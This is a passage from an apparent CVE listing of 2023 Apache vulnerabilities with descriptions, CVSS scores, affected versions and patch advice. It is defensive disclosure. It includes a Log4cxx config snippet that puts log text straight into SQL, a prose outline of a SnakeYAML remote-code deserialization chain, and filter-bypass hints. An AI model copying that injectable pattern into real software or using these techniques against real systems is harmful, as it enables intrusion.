security@apache.org 0.0 NONE CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:N 2.8 0.0

Products Affected

Vendor Product Version
apache pulsar *
apache pulsar 2.11.0
CVE-2023-31038

SQL injection in Log4cxx when using the ODBC appender to send log messages to a database.  No fields sent to the database were properly escaped for SQL injection.  This has been the case since at least version 0.9.0(released 2003-08-06) Note that Log4cxx is a C++ framework, so only C++ applications are affected. Before version 1.1.0, the ODBC appender was automatically part of Log4cxx if the library was found when compiling the library.  As of version 1.1.0, this must be both explicitly enabled in order to be compiled in. Three preconditions must be met for this vulnerability to be possible: 1. Log4cxx compiled with ODBC support(before version 1.1.0, this was auto-detected at compile time) 2. ODBCAppender enabled for logging messages to, generally done via a config file 3. User input is logged at some point. If your application does not have user input, it is unlikely to be affected. Users are recommended to upgrade to version 1.1.0 which properly binds the parameters to the SQL statement, or migrate to the new DBAppender class which supports an ODBC connection in addition to other databases. Note that this fix does require a configuration file update, as the old configuration files will not configure properly.  An example is shown below, and more information may be found in the Log4cxx documentation on the ODBCAppender. Example of old configuration snippet: <appender name="SqlODBCAppender" class="ODBCAppender">     <param name="sql" value="INSERT INTO logs (message) VALUES ('%m')" />     ... other params here ... </appender> The migrated configuration snippet with new ColumnMapping parameters: <appender name="SqlODBCAppender" class="ODBCAppender">     <param name="sql" value="INSERT INTO logs (message) VALUES (?)" />     <param name="ColumnMapping" value="message"/>     ... other params here ... </appender>

Products Affected

Vendor Product Version
apache log4cxx *
CVE-2023-31039

Security vulnerability in Apache bRPC <1.5.0 on all platforms allows attackers to execute arbitrary code via ServerOptions::pid_file. An attacker that can influence the ServerOptions pid_file parameter with which the bRPC server is started can execute arbitrary code with the permissions of the bRPC process. Solution: 1. upgrade to bRPC >= 1.5.0, download link:  https://dist.apache.org/repos/dist/release/brpc/1.5.0/ https://dist.apache.org/repos/dist/release/brpc/1.5.0/ 2. If you are using an old version of bRPC and hard to upgrade, you can apply this patch:  https://github.com/apache/brpc/pull/2218 https://github.com/apache/brpc/pull/2218

Products Affected

Vendor Product Version
apache brpc *
CVE-2023-31058

Deserialization of Untrusted Data Vulnerability in Apache Software Foundation Apache InLong.This issue affects Apache InLong: from 1.4.0 through 1.6.0. Attackers would bypass the 'autoDeserialize' option filtering by adding blanks. Users are advised to upgrade to Apache InLong's 1.7.0 or cherry-pick  https://github.com/apache/inlong/pull/7674 https://github.com/apache/inlong/pull/7674 to solve it.

Products Affected

Vendor Product Version
apache inlong *
CVE-2023-31062

Improper Privilege Management Vulnerabilities in Apache Software Foundation Apache InLong.This issue affects Apache InLong: from 1.2.0 through 1.6.0.  When the attacker has access to a valid (but unprivileged) account, the exploit can be executed using Burp Suite by sending a login request and following it with a subsequent HTTP request using the returned cookie. Users are advised to upgrade to Apache InLong's 1.7.0 or cherry-pick https://github.com/apache/inlong/pull/7836 https://github.com/apache/inlong/pull/7836 to solve it.

Products Affected

Vendor Product Version
apache inlong *
CVE-2023-31064

Files or Directories Accessible to External Parties vulnerability in Apache Software Foundation Apache InLong.This issue affects Apache InLong: from 1.2.0 through 1.6.0. the user in InLong could cancel an application that doesn't belongs to it. Users are advised to upgrade to Apache InLong's 1.7.0 or cherry-pick https://github.com/apache/inlong/pull/7799 https://github.com/apache/inlong/pull/7799 to solve it.

Products Affected

Vendor Product Version
apache inlong *
CVE-2023-31065

Insufficient Session Expiration vulnerability in Apache Software Foundation Apache InLong.This issue affects Apache InLong: from 1.4.0 through 1.6.0.  An old session can be used by an attacker even after the user has been deleted or the password has been changed. Users are advised to upgrade to Apache InLong's 1.7.0 or cherry-pick https://github.com/apache/inlong/pull/7836 https://github.com/apache/inlong/pull/7836 , https://github.com/apache/inlong/pull/7884 https://github.com/apache/inlong/pull/7884 to solve it.

Products Affected

Vendor Product Version
apache inlong *
CVE-2023-31066

Files or Directories Accessible to External Parties vulnerability in Apache Software Foundation Apache InLong.This issue affects Apache InLong: from 1.4.0 through 1.6.0. Different users in InLong could delete, edit, stop, and start others' sources! Users are advised to upgrade to Apache InLong's 1.7.0 or cherry-pick https://github.com/apache/inlong/pull/7775 https://github.com/apache/inlong/pull/7775 to solve it.

Products Affected

Vendor Product Version
apache inlong *
CVE-2023-31098

Weak Password Requirements vulnerability in Apache Software Foundation Apache InLong.This issue affects Apache InLong: from 1.1.0 through 1.6.0.  When users change their password to a simple password (with any character or symbol), attackers can easily guess the user's password and access the account. Users are advised to upgrade to Apache InLong's 1.7.0 or cherry-pick https://github.com/apache/inlong/pull/7805 https://github.com/apache/inlong/pull/7805 to solve it.

Products Affected

Vendor Product Version
apache inlong *
CVE-2023-31101

Insecure Default Initialization of Resource Vulnerability in Apache Software Foundation Apache InLong.This issue affects Apache InLong: from 1.5.0 through 1.6.0. Users registered in InLong who joined later can see deleted users' data. Users are advised to upgrade to Apache InLong's 1.7.0 or cherry-pick https://github.com/apache/inlong/pull/7836 https://github.com/apache/inlong/pull/7836 to solve it.

Products Affected

Vendor Product Version
apache inlong 1.6.0
apache inlong 1.5.0
CVE-2023-31103

Exposure of Resource to Wrong Sphere Vulnerability in Apache Software Foundation Apache InLong.This issue affects Apache InLong: from 1.4.0 through 1.6.0.  Attackers can change the immutable name and type of cluster of InLong. Users are advised to upgrade to Apache InLong's 1.7.0 or cherry-pick https://github.com/apache/inlong/pull/7891 https://github.com/apache/inlong/pull/7891 to solve it.

Products Affected

Vendor Product Version
apache inlong *
CVE-2023-31122

Out-of-bounds Read vulnerability in mod_macro of Apache HTTP Server.This issue affects Apache HTTP Server: through 2.4.57.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

Products Affected

Vendor Product Version
apache http_server *
fedoraproject fedora 38
debian debian_linux 10.0
CVE-2023-31206

Exposure of Resource to Wrong Sphere Vulnerability in Apache Software Foundation Apache InLong.This issue affects Apache InLong: from 1.4.0 through 1.6.0. Attackers can change the immutable name and type of nodes of InLong. Users are advised to upgrade to Apache InLong's 1.7.0 or cherry-pick [1] to solve it. [1] https://cveprocess.apache.org/cve5/[1]%C2%A0https://github.com/apache/inlong/pull/7891 https://github.com/apache/inlong/pull/7891 https://github.com/apache/inlong/pull/7891

Products Affected

Vendor Product Version
apache inlong *
CVE-2023-31453

Incorrect Permission Assignment for Critical Resource Vulnerability in Apache Software Foundation Apache InLong.This issue affects Apache InLong: from 1.2.0 through 1.6.0. The attacker can delete others' subscriptions, even if they are not the owner of the deleted subscription. Users are advised to upgrade to Apache InLong's 1.7.0 or cherry-pick [1] to solve it. [1] https://github.com/apache/inlong/pull/7949 https://github.com/apache/inlong/pull/7949

Products Affected

Vendor Product Version
apache inlong *
CVE-2023-31454

Incorrect Permission Assignment for Critical Resource Vulnerability in Apache Software Foundation Apache InLong.This issue affects Apache InLong: from 1.2.0 through 1.6.0.  The attacker can bind any cluster, even if he is not the cluster owner. Users are advised to upgrade to Apache InLong's 1.7.0 or cherry-pick [1] to solve it.[1] https://github.com/apache/inlong/pull/7947 https://github.com/apache/inlong/pull/7947

Products Affected

Vendor Product Version
apache inlong *
CVE-2023-31469

A REST interface in Apache StreamPipes (versions 0.69.0 to 0.91.0) was not properly restricted to admin-only access. This allowed a non-admin user with valid login credentials to elevate privileges beyond the initially assigned roles. The issue is resolved by upgrading to StreamPipes 0.92.0.

Products Affected

Vendor Product Version
apache streampipes *
CVE-2023-32007

** UNSUPPORTED WHEN ASSIGNED ** The Apache Spark UI offers the possibility to enable ACLs via the configuration option spark.acls.enable. With an authentication filter, this checks whether a user has access permissions to view or modify the application. If ACLs are enabled, a code path in HttpSecurityFilter can allow someone to perform impersonation by providing an arbitrary user name. A malicious user might then be able to reach a permission check function that will ultimately build a Unix shell command based on their input, and execute it. This will result in arbitrary shell command execution as the user Spark is currently running as. This issue was disclosed earlier as CVE-2022-33891, but incorrectly claimed version 3.1.3 (which has since gone EOL) would not be affected. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. Users are recommended to upgrade to a supported version of Apache Spark, such as version 3.4.0.

Products Affected

Vendor Product Version
apache spark *
CVE-2023-32200

There is insufficient restrictions of called script functions in Apache Jena versions 4.8.0 and earlier. It allows a remote user to execute javascript via a SPARQL query. This issue affects Apache Jena: from 3.7.0 through 4.8.0.

Products Affected

Vendor Product Version
apache jena *
CVE-2023-32672

An Incorrect authorisation check in SQLLab in Apache Superset versions up to and including 2.1.0. This vulnerability allows an authenticated user to query tables that they do not have proper access to within Superset. The vulnerability can be exploited by leveraging a SQL parsing vulnerability.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 4.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N 2.8 1.4
security@apache.org 4.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N 2.8 1.4

Products Affected

Vendor Product Version
apache superset *
CVE-2023-33008

Deserialization of Untrusted Data vulnerability in Apache Software Foundation Apache Johnzon. A malicious attacker can craft up some JSON input that uses large numbers (numbers such as 1e20000000) that Apache Johnzon will deserialize into BigDecimal and maybe use numbers too large which may result in a slow conversion (Denial of service risk). Apache Johnzon 1.2.21 mitigates this by setting a scale limit of 1000 (by default) to the BigDecimal. This issue affects Apache Johnzon: through 1.2.20.

Products Affected

Vendor Product Version
apache johnzon *
CVE-2023-33234

Arbitrary code execution in Apache Airflow CNCF Kubernetes provider version 5.0.0 allows user to change xcom sidecar image and resources via Airflow connection. In order to exploit this weakness, a user would already need elevated permissions (Op or Admin) to change the connection object in this manner.  Operators should upgrade to provider version 7.0.0 which has removed the vulnerability.

Products Affected

Vendor Product Version
apache airflow_cncf_kubernetes *
CVE-2023-33246

For RocketMQ versions 5.1.0 and below, under certain conditions, there is a risk of remote command execution.  Several components of RocketMQ, including NameServer, Broker, and Controller, are leaked on the extranet and lack permission verification, an attacker can exploit this vulnerability by using the update configuration function to execute commands as the system users that RocketMQ is running as. Additionally, an attacker can achieve the same effect by forging the RocketMQ protocol content.  To prevent these attacks, users are recommended to upgrade to version 5.1.1 or above for using RocketMQ 5.x or 4.9.6 or above for using RocketMQ 4.x .

Products Affected

Vendor Product Version
apache rocketmq *
CVE-2023-33933

Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Apache Software Foundation Apache Traffic Server.This issue affects Apache Traffic Server: from 8.0.0 through 9.2.0. 8.x users should upgrade to 8.1.7 or later versions 9.x users should upgrade to 9.2.1 or later versions

Products Affected

Vendor Product Version
apache traffic_server *
CVE-2023-33934

Improper Input Validation vulnerability in Apache Software Foundation Apache Traffic Server.This issue affects Apache Traffic Server: through 9.2.1.

Products Affected

Vendor Product Version
apache traffic_server *
CVE-2023-34149

Allocation of Resources Without Limits or Throttling vulnerability in Apache Software Foundation Apache Struts.This issue affects Apache Struts: through 2.5.30, through 6.1.2. Upgrade to Struts 2.5.31 or 6.1.2.1 or greater.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 4.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L 2.8 1.4

Products Affected

Vendor Product Version
apache struts *
CVE-2023-34150

** UNSUPPORTED WHEN ASSIGNED ** Use of TikaEncodingDetector in Apache Any23 can cause excessive memory usage.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L 3.9 2.5

Products Affected

Vendor Product Version
apache any23 *
CVE-2023-34189

Exposure of Resource to Wrong Sphere Vulnerability in Apache Software Foundation Apache InLong.This issue affects Apache InLong: from 1.4.0 through 1.7.0. The attacker could use general users to delete and update the process, which only the admin can operate occurrences.  Users are advised to upgrade to Apache InLong's 1.8.0 or cherry-pick https://github.com/apache/inlong/pull/8109  to solve it.

Products Affected

Vendor Product Version
apache inlong *
CVE-2023-34212

The JndiJmsConnectionFactoryProvider Controller Service, along with the ConsumeJMS and PublishJMS Processors, in Apache NiFi 1.8.0 through 1.21.0 allow an authenticated and authorized user to configure URL and library properties that enable deserialization of untrusted data from a remote location. The resolution validates the JNDI URL and restricts locations to a set of allowed schemes. You are recommended to upgrade to version 1.22.0 or later which fixes this issue.

Products Affected

Vendor Product Version
apache nifi *
CVE-2023-34340

Improper Authentication vulnerability in Apache Software Foundation Apache Accumulo. This issue affects Apache Accumulo: 2.1.0. Accumulo 2.1.0 contains a defect in the user authentication process that may succeed when invalid credentials are provided. Users are advised to upgrade to 2.1.1.

Products Affected

Vendor Product Version
apache accumulo 2.1.0
CVE-2023-34395

Improper Neutralization of Argument Delimiters in a Command ('Argument Injection') vulnerability in Apache Software Foundation Apache Airflow ODBC Provider. In OdbcHook, A privilege escalation vulnerability exists in a system due to controllable ODBC driver parameters that allow the loading of arbitrary dynamic-link libraries, resulting in command execution. Starting version 4.0.0 driver can be set only from the hook constructor. This issue affects Apache Airflow ODBC Provider: before 4.0.0.

Products Affected

Vendor Product Version
apache apache-airflow-providers-odbc *
CVE-2023-34396

Allocation of Resources Without Limits or Throttling vulnerability in Apache Software Foundation Apache Struts.This issue affects Apache Struts: through 2.5.30, through 6.1.2. Upgrade to Struts 2.5.31 or 6.1.2.1 or greater

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 4.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L 2.8 1.4

Products Affected

Vendor Product Version
apache struts *
CVE-2023-34434

Deserialization of Untrusted Data Vulnerability in Apache Software Foundation Apache InLong.This issue affects Apache InLong: from 1.4.0 through 1.7.0.  The attacker could bypass the current logic and achieve arbitrary file reading. To solve it, users are advised to upgrade to Apache InLong's 1.8.0 or cherry-pick https://github.com/apache/inlong/pull/8130 .

Products Affected

Vendor Product Version
apache inlong *
CVE-2023-34442

Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Apache Software Foundation Apache Camel.This issue affects Apache Camel: from 3.X through <=3.14.8, from 3.18.X through <=3.18.7, from 3.20.X through <= 3.20.5, from 4.X through <= 4.0.0-M3. Users should upgrade to 3.14.9, 3.18.8, 3.20.6 or 3.21.0 and for users on Camel 4.x update to 4.0.0-M1

Products Affected

Vendor Product Version
apache camel 4.0.0
apache camel *
CVE-2023-34468

The DBCPConnectionPool and HikariCPConnectionPool Controller Services in Apache NiFi 0.0.2 through 1.21.0 allow an authenticated and authorized user to configure a Database URL with the H2 driver that enables custom code execution. The resolution validates the Database URL and rejects H2 JDBC locations. You are recommended to upgrade to version 1.22.0 or later which fixes this issue.

Products Affected

Vendor Product Version
apache nifi *
CVE-2023-34478

Apache Shiro, before 1.12.0 or 2.0.0-alpha-3, may be susceptible to a path traversal attack that results in an authentication bypass when used together with APIs or other web frameworks that route requests based on non-normalized requests. Mitigation: Update to Apache Shiro 1.12.0+ or 2.0.0-alpha-3+

Products Affected

Vendor Product Version
apache shiro 2.0.0
apache shiro *
CVE-2023-34981

A regression in the fix for bug 66512 in Apache Tomcat 11.0.0-M5, 10.1.8, 9.0.74 and 8.5.88 meant that, if a response did not include any HTTP headers no AJP SEND_HEADERS messare woudl be sent for the response which in turn meant that at least one AJP proxy (mod_proxy_ajp) would use the response headers from the previous request leading to an information leak.

Products Affected

Vendor Product Version
apache tomcat 11.0.0
apache tomcat 9.0.74
apache tomcat 8.5.88
apache tomcat 10.1.8
CVE-2023-35005

In Apache Airflow, some potentially sensitive values were being shown to the user in certain situations. This vulnerability is mitigated by the fact configuration is not shown in the UI by default (only if `[webserver] expose_config` is set to `non-sensitive-only`), and not all uncensored values are actually sentitive. This issue affects Apache Airflow: from 2.5.0 before 2.6.2. Users are recommended to update to version 2.6.2 or later.

Products Affected

Vendor Product Version
apache airflow *
CVE-2023-35088

Improper Neutralization of Special Elements Used in an SQL Command ('SQL Injection') vulnerability in Apache Software Foundation Apache InLong.This issue affects Apache InLong: from 1.4.0 through 1.7.0.  In the toAuditCkSql method, the groupId, streamId, auditId, and dt are directly concatenated into the SQL query statement, which may lead to SQL injection attacks. Users are advised to upgrade to Apache InLong's 1.8.0 or cherry-pick [1] to solve it. [1] https://github.com/apache/inlong/pull/8198

Products Affected

Vendor Product Version
apache inlong *
CVE-2023-35701

Improper Control of Generation of Code ('Code Injection') vulnerability in Apache Hive. The vulnerability affects the Hive JDBC driver component and it can potentially lead to arbitrary code execution on the machine/endpoint that the JDBC driver (client) is running. The malicious user must have sufficient permissions to specify/edit JDBC URL(s) in an endpoint relying on the Hive JDBC driver and the JDBC client process must run under a privileged user to fully exploit the vulnerability.  The attacker can setup a malicious HTTP server and specify a JDBC URL pointing towards this server. When a JDBC connection is attempted, the malicious HTTP server can provide a special response with customized payload that can trigger the execution of certain commands in the JDBC client.This issue affects Apache Hive: from 4.0.0-alpha-1 before 4.0.0. Users are recommended to upgrade to version 4.0.0, which fixes the issue.

Products Affected

Vendor Product Version
apache hive 4.0.0
CVE-2023-35797

Improper Input Validation vulnerability in Apache Software Foundation Apache Airflow Hive Provider. This issue affects Apache Airflow Apache Hive Provider: before 6.1.1. Before version 6.1.1 it was possible to bypass the security check to RCE via principal parameter. For this to be exploited it requires access to modifying the connection details. It is recommended updating provider version to 6.1.1 in order to avoid this vulnerability.

Products Affected

Vendor Product Version
apache apache-airflow-providers-apache-hive *
CVE-2023-35798

Input Validation vulnerability in Apache Software Foundation Apache Airflow ODBC Provider, Apache Software Foundation Apache Airflow MSSQL Provider.This vulnerability is considered low since it requires DAG code to use `get_sqlalchemy_connection` and someone with access to connection resources specifically updating the connection to exploit it. This issue affects Apache Airflow ODBC Provider: before 4.0.0; Apache Airflow MSSQL Provider: before 3.4.1. It is recommended to upgrade to a version that is not affected

Products Affected

Vendor Product Version
apache apache-airflow-providers-odbc *
apache apache-airflow-providers-microsoft-mssql *
CVE-2023-35887

Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Apache Software Foundation Apache MINA. In SFTP servers implemented using Apache MINA SSHD that use a RootedFileSystem, logged users may be able to discover "exists/does not exist" information about items outside the rooted tree via paths including parent navigation ("..") beyond the root, or involving symlinks. This issue affects Apache MINA: from 1.0 before 2.10. Users are recommended to upgrade to 2.10

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 5.0 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N 3.1 1.4

Products Affected

Vendor Product Version
apache sshd *
CVE-2023-35908

Apache Airflow, versions before 2.6.3, is affected by a vulnerability that allows unauthorized read access to a DAG through the URL. It is recommended to upgrade to a version that is not affected

Products Affected

Vendor Product Version
apache airflow *
CVE-2023-36387

An improper default REST API permission for Gamma users in Apache Superset up to and including 2.1.0 allows for an authenticated Gamma user to test database connections.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 5.4 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:L 2.8 2.5
nvd@nist.gov 5.4 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L 2.8 2.5

Products Affected

Vendor Product Version
apache superset *
CVE-2023-36388

Improper REST API permission in Apache Superset up to and including 2.1.0 allows for an authenticated Gamma users to test network connections, possible SSRF.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.4 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N 2.8 2.5
security@apache.org 4.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N 2.8 1.4

Products Affected

Vendor Product Version
apache superset *
CVE-2023-36542

Apache NiFi 0.0.2 through 1.22.0 include Processors and Controller Services that support HTTP URL references for retrieving drivers, which allows an authenticated and authorized user to configure a location that enables custom code execution. The resolution introduces a new Required Permission for referencing remote resources, restricting configuration of these components to privileged users. The permission prevents unprivileged users from configuring Processors and Controller Services annotated with the new Reference Remote Resources restriction. Upgrading to Apache NiFi 1.23.0 is the recommended mitigation.

Products Affected

Vendor Product Version
apache nifi *
CVE-2023-36543

Apache Airflow, versions before 2.6.3, has a vulnerability where an authenticated user can use crafted input to make the current request hang. It is recommended to upgrade to a version that is not affected

Products Affected

Vendor Product Version
apache airflow *
CVE-2023-37379

Apache Airflow, in versions prior to 2.7.0, contains a security vulnerability that can be exploited by an authenticated user possessing Connection edit privileges. This vulnerability allows the user to access connection information and exploit the test connection feature by sending many requests, leading to a denial of service (DoS) condition on the server. Furthermore, malicious actors can leverage this vulnerability to establish harmful connections with the server. Users of Apache Airflow are strongly advised to upgrade to version 2.7.0 or newer to mitigate the risk associated with this vulnerability. Additionally, administrators are encouraged to review and adjust user permissions to restrict access to sensitive functionalities, reducing the attack surface.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.1 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H 2.8 5.2

Products Affected

Vendor Product Version
apache airflow *
CVE-2023-37415

Improper Input Validation vulnerability in Apache Software Foundation Apache Airflow Apache Hive Provider. Patching on top of CVE-2023-35797 Before 6.1.2 the proxy_user option can also inject semicolon. This issue affects Apache Airflow Apache Hive Provider: before 6.1.2. It is recommended updating provider version to 6.1.2 in order to avoid this vulnerability.

Products Affected

Vendor Product Version
apache apache-airflow-providers-apache-hive *
CVE-2023-37536

An integer overflow in xerces-c++ 3.2.3 in BigFix Platform allows remote attackers to cause out-of-bound access via HTTP request.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9
psirt@hcl.com 8.2 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:H 2.3 5.3

Products Affected

Vendor Product Version
fedoraproject fedora 37
apache xerces-c++ 3.2.3
hcltech bigfix_platform *
CVE-2023-37544

Improper Authentication vulnerability in Apache Pulsar WebSocket Proxy allows an attacker to connect to the /pingpong endpoint without authentication. This issue affects Apache Pulsar WebSocket Proxy: from 2.8.0 through 2.8.*, from 2.9.0 through 2.9.*, from 2.10.0 through 2.10.4, from 2.11.0 through 2.11.1, 3.0.0. The known risks include a denial of service due to the WebSocket Proxy accepting any connections, and excessive data transfer due to misuse of the WebSocket ping/pong feature. 2.10 Pulsar WebSocket Proxy users should upgrade to at least 2.10.5. 2.11 Pulsar WebSocket Proxy users should upgrade to at least 2.11.2. 3.0 Pulsar WebSocket Proxy users should upgrade to at least 3.0.1. 3.1 Pulsar WebSocket Proxy users are unaffected. Any users running the Pulsar WebSocket Proxy for 2.8, 2.9, and earlier should upgrade to one of the above patched versions.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6
security@apache.org 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

Products Affected

Vendor Product Version
apache pulsar *
apache pulsar 3.0.0
CVE-2023-37579

Incorrect Authorization vulnerability in Apache Software Foundation Apache Pulsar Function Worker. This issue affects Apache Pulsar: before 2.10.4, and 2.11.0. Any authenticated user can retrieve a source's configuration or a sink's configuration without authorization. Many sources and sinks contain credentials in the configuration, which could lead to leaked credentials. This vulnerability is mitigated by the fact that there is not a known way for an authenticated user to enumerate another tenant's sources or sinks, meaning the source or sink name would need to be guessed in order to exploit this vulnerability. The recommended mitigation for impacted users is to upgrade the Pulsar Function Worker to a patched version. 2.10 Pulsar Function Worker users should upgrade to at least 2.10.4. 2.11 Pulsar Function Worker users should upgrade to at least 2.11.1. 3.0 Pulsar Function Worker users are unaffected. Any users running the Pulsar Function Worker for 2.9.* and earlier should upgrade to one of the above patched versions.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 8.2 HIGH CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:N 1.8 5.8

Products Affected

Vendor Product Version
apache pulsar *
apache pulsar 2.11.0
CVE-2023-37581

Insufficient input validation and sanitation in Weblog Category name, Website About and File Upload features in all versions of Apache Roller on all platforms allows an authenticated user to perform an XSS attack. Mitigation: if you do not have Roller configured for untrusted users, then you need to do nothing because you trust your users to author raw HTML and other web content. If you are running with untrusted users then you should upgrade to Roller 6.1.2 and you should disable Roller's File Upload feature. 

Products Affected

Vendor Product Version
apache roller *
CVE-2023-37582

The RocketMQ NameServer component still has a remote command execution vulnerability as the CVE-2023-33246 issue was not completely fixed in version 5.1.1. When NameServer address are leaked on the extranet and lack permission verification, an attacker can exploit this vulnerability by using the update configuration function on the NameServer component to execute commands as the system users that RocketMQ is running as. It is recommended for users to upgrade their NameServer version to 5.1.2 or above for RocketMQ 5.x or 4.9.7 or above for RocketMQ 4.x to prevent these attacks.

Products Affected

Vendor Product Version
apache rocketmq *
CVE-2023-37895

Java object deserialization issue in Jackrabbit webapp/standalone on all platforms allows attacker to remotely execute code via RMIVersions up to (including) 2.20.10 (stable branch) and 2.21.17 (unstable branch) use the component "commons-beanutils", which contains a class that can be used for remote code execution over RMI. Users are advised to immediately update to versions 2.20.11 or 2.21.18. Note that earlier stable branches (1.0.x .. 2.18.x) have been EOLd already and do not receive updates anymore. In general, RMI support can expose vulnerabilities by the mere presence of an exploitable class on the classpath. Even if Jackrabbit itself does not contain any code known to be exploitable anymore, adding other components to your server can expose the same type of problem. We therefore recommend to disable RMI access altogether (see further below), and will discuss deprecating RMI support in future Jackrabbit releases. How to check whether RMI support is enabledRMI support can be over an RMI-specific TCP port, and over an HTTP binding. Both are by default enabled in Jackrabbit webapp/standalone. The native RMI protocol by default uses port 1099. To check whether it is enabled, tools like "netstat" can be used to check. RMI-over-HTTP in Jackrabbit by default uses the path "/rmi". So when running standalone on port 8080, check whether an HTTP GET request on localhost:8080/rmi returns 404 (not enabled) or 200 (enabled). Note that the HTTP path may be different when the webapp is deployed in a container as non-root context, in which case the prefix is under the user's control. Turning off RMIFind web.xml (either in JAR/WAR file or in unpacked web application folder), and remove the declaration and the mapping definition for the RemoteBindingServlet:         <servlet>             <servlet-name>RMI</servlet-name>             <servlet-class>org.apache.jackrabbit.servlet.remote.RemoteBindingServlet</servlet-class>         </servlet>         <servlet-mapping>             <servlet-name>RMI</servlet-name>             <url-pattern>/rmi</url-pattern>         </servlet-mapping> Find the bootstrap.properties file (in $REPOSITORY_HOME), and set         rmi.enabled=false     and also remove         rmi.host         rmi.port         rmi.url-pattern  If there is no file named bootstrap.properties in $REPOSITORY_HOME, it is located somewhere in the classpath. In this case, place a copy in $REPOSITORY_HOME and modify it as explained.

Products Affected

Vendor Product Version
apache jackrabbit *
CVE-2023-37924

Apache Software Foundation Apache Submarine has an SQL injection vulnerability when a user logs in. This issue can result in unauthorized login. Now we have fixed this issue and now user must have the correct login to access workbench. This issue affects Apache Submarine: from 0.7.0 before 0.8.0. We recommend that all submarine users with 0.7.0 upgrade to 0.8.0, which not only fixes the issue, supports the oidc authentication mode, but also removes the case of unauthenticated logins. If using the version lower than 0.8.0 and not want to upgrade, you can try cherry-pick PR https://github.com/apache/submarine/pull/1037 https://github.com/apache/submarine/pull/1054 and rebuild the submarine-server image to fix this.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache submarine *
CVE-2023-37941

If an attacker gains write access to the Apache Superset metadata database, they could persist a specifically crafted Python object that may lead to remote code execution on Superset's web backend. The Superset metadata db is an 'internal' component that is typically only accessible directly by the system administrator and the superset process itself. Gaining access to that database should be difficult and require significant privileges. This vulnerability impacts Apache Superset versions 1.5.0 up to and including 2.1.0. Users are recommended to upgrade to version 2.1.1 or later.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 6.6 MEDIUM CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H 0.7 5.9
nvd@nist.gov 6.6 MEDIUM CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H 0.7 5.9

Products Affected

Vendor Product Version
apache superset *
CVE-2023-38435

An improper neutralization of input during web page generation ('Cross-site Scripting') [CWE-79] vulnerability in Apache Felix Healthcheck Webconsole Plugin version 2.0.2 and prior may allow an attacker to perform a reflected cross-site scripting (XSS) attack. Upgrade to Apache Felix Healthcheck Webconsole Plugin 2.1.0 or higher.

Products Affected

Vendor Product Version
apache felix_health_check_webconsole_plugin *
CVE-2023-38522

Apache Traffic Server accepts characters that are not allowed for HTTP field names and forwards malformed requests to origin servers. This can be utilized for request smuggling and may also lead cache poisoning if the origin servers are vulnerable. This issue affects Apache Traffic Server: from 8.0.0 through 8.1.10, from 9.0.0 through 9.2.4. Users are recommended to upgrade to version 8.1.11 or 9.2.5, which fixes the issue.

Products Affected

Vendor Product Version
apache traffic_server *
CVE-2023-38647

An attacker can use SnakeYAML to deserialize java.net.URLClassLoader and make it load a JAR from a specified URL, and then deserialize javax.script.ScriptEngineManager to load code using that ClassLoader. This unbounded deserialization can likely lead to remote code execution. The code can be run in Helix REST start and Workflow creation. Affect all the versions lower and include 1.2.0. Affected products: helix-core, helix-rest Mitigation: Short term, stop using any YAML based configuration and workflow creation.                   Long term, all Helix version bumping up to 1.3.0 

Products Affected

Vendor Product Version
apache helix *
CVE-2023-38709

